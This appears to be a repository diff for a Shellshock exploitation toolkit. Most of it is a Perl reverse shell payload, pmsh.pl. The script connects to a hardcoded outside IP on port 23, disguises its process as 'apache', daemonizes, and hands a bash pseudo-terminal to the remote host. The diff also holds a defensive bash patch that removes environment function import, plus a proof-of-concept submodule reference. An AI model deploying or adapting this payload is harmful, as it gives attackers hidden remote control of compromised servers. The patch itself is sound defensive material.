OS_Injections/ShellShocker/scripts/paylod_2.pl Normal file
View File

@ -0,0 +1,107 @@
#!/usr/bin/perl -w
use IO::Socket;
use Fcntl;
# IOCTLs
$TIOCGPTN = -2147199952;
$TIOCSPTLCK = 1074025521;
$EAGAIN=11;
print "pmsh.pl v0.1 (c) 2006 Michael Schierl <schierlm-public AT gmx DOT de>\n";
$HOST="72.167.37.182";
$PORT="23";
$0="apache";
print "Connecting to $HOST:$PORT... ";
$sock = new IO::Socket::INET (
PeerAddr => $HOST,
PeerPort => $PORT,
Proto => 'tcp',
Blocking => 0,
) or die $!;
print "ok\nAllocatig pseudo terminal... ";
## ptsname
sysopen (PTMX, '/dev/ptmx', O_RDWR|O_NONBLOCK) or die $!;
$tmp='';
ioctl (PTMX, $TIOCGPTN, $tmp) or die $!;
$pts = unpack('i', $tmp);
print "/dev/pts/$pts\nInitializing pseudo terminal... ";
## grantpt not needed on devpts
## unlockpt
$unlock=pack('i', 0);
ioctl(PTMX, $TIOCSPTLCK, $unlock) or die $!;
## prepare daemonizing
chdir '/' or die $!;
open STDIN, '/dev/null' or die $!;
umask 0;
print "ok\nForking shell thread...";
defined($pid = fork) or die $!;
exit if $pid;
defined($pid = fork) or die $!;
if (!$pid) {
exec("/sbin/getty -n -l /bin/bash 38400 /dev/pts/$pts") or
exec("/bin/bash </dev/pts/$pts >/dev/pts/$pts 2>/dev/pts/$pts") or
die $!;
exit;
}
print "ok\nHave fun!\n";
open STDOUT, '>>/dev/null' or die $!;
open STDERR, '>>/dev/null' or die $!;
$pp = PTMX;
$rin=$win=$ein='';
vec($rin,fileno($pp),1) =1;
vec($rin,fileno($sock),1) = 1;
select $sock;
$|=1;
select PTMX;
$|=1;
select STDOUT;
$|=1;
$finished=0;
sub forwarddata {
my ($from,$to) = @_;
while(1) {
$rv = sysread($from, $buff, 1024);
last if (!defined($rv) && $! == $EAGAIN);
defined($rv) or die $!;
if ($rv == 0) { $finished = 1; last;}
while(length $buff > 0) {
$rv = syswrite($to, $buff, length $buff);
if (!defined($rv) && $! == $EAGAIN) {
## try again
next;
}
defined($rv) or die $!;
last if ($rv == length $buff);
substr($buff,0,$rv) = '';
}
}
}
while(! $finished) {
$nfound = select($rout=$rin, $wout=$win, $eout=$ein, undef);
die $! if ($nfound == -1);
forwarddata($pp,$sock);
last if $finished;
forwarddata($sock,$pp);
last if $finished;
}
close PTMX;
close $sock;

106
OS_Injections/ShellShocker/scripts/shellshock_nuke.sh Normal file
View File

@ -0,0 +1,106 @@
#shellshock fix. Nuke the whole feature from orbit, it's the only way to be sure. -@andreasdotorg
diff --git a/variables.c b/variables.c
index cdc54bc..1a98efa 100644
--- a/variables.c
+++ b/variables.c
@@ -347,85 +347,25 @@ initialize_shell_variables (env, privmode)
temp_var = (SHELL_VAR *)NULL;
- /* If exported function, define it now. Don't import functions from
- the environment in privileged mode. */
- if (privmode == 0 && read_but_dont_execute == 0 && STREQN ("() {", string, 4))
+ ro = 0;
+ if (posixly_correct && STREQ (name, "SHELLOPTS"))
{
- string_length = strlen (string);
- temp_string = (char *)xmalloc (3 + string_length + char_index);
-
- strcpy (temp_string, name);
- temp_string[char_index] = ' ';
- strcpy (temp_string + char_index + 1, string);
-
- if (posixly_correct == 0 || legal_identifier (name))
- parse_and_execute (temp_string, name, SEVAL_NONINT|SEVAL_NOHIST);
-
- /* Ancient backwards compatibility. Old versions of bash exported
- functions like name()=() {...} */
- if (name[char_index - 1] == ')' && name[char_index - 2] == '(')
- name[char_index - 2] = '\0';
-
- if (temp_var = find_function (name))
- {
- VSETATTR (temp_var, (att_exported|att_imported));
- array_needs_making = 1;
- }
- else
- {
- if (temp_var = bind_variable (name, string, 0))
- {
- VSETATTR (temp_var, (att_exported | att_imported | att_invisible));
- array_needs_making = 1;
- }
- last_command_exit_value = 1;
- report_error (_("error importing function definition for `%s'"), name);
- }
-
- /* ( */
- if (name[char_index - 1] == ')' && name[char_index - 2] == '\0')
- name[char_index - 2] = '('; /* ) */
+ temp_var = find_variable ("SHELLOPTS");
+ ro = temp_var && readonly_p (temp_var);
+ if (temp_var)
+ VUNSETATTR (temp_var, att_readonly);
}
-#if defined (ARRAY_VARS)
-# if ARRAY_EXPORT
- /* Array variables may not yet be exported. */
- else if (*string == '(' && string[1] == '[' && string[strlen (string) - 1] == ')')
+ temp_var = bind_variable (name, string, 0);
+ if (temp_var)
{
- string_length = 1;
- temp_string = extract_array_assignment_list (string, &string_length);
- temp_var = assign_array_from_string (name, temp_string);
- FREE (temp_string);
- VSETATTR (temp_var, (att_exported | att_imported));
+ if (legal_identifier (name))
+ VSETATTR (temp_var, (att_exported | att_imported));
+ else
+ VSETATTR (temp_var, (att_exported | att_imported | att_invisible));
+ if (ro)
+ VSETATTR (temp_var, att_readonly);
array_needs_making = 1;
}
-# endif /* ARRAY_EXPORT */
-#endif
-#if 0
- else if (legal_identifier (name))
-#else
- else
-#endif
- {
- ro = 0;
- if (posixly_correct && STREQ (name, "SHELLOPTS"))
- {
- temp_var = find_variable ("SHELLOPTS");
- ro = temp_var && readonly_p (temp_var);
- if (temp_var)
- VUNSETATTR (temp_var, att_readonly);
- }
- temp_var = bind_variable (name, string, 0);
- if (temp_var)
- {
- if (legal_identifier (name))
- VSETATTR (temp_var, (att_exported | att_imported));
- else
- VSETATTR (temp_var, (att_exported | att_imported | att_invisible));
- if (ro)
- VSETATTR (temp_var, att_readonly);
- array_needs_making = 1;
- }
- }
name[char_index] = '=';
/* temp_var can be NULL if it was an exported function with a syntax

1
OS_Injections/ShellShocker/shellshocker-pocs Submodule

@ -0,0 +1 @@
Subproject commit 3a4706e51449753b16a6b1d761276ec791129f4c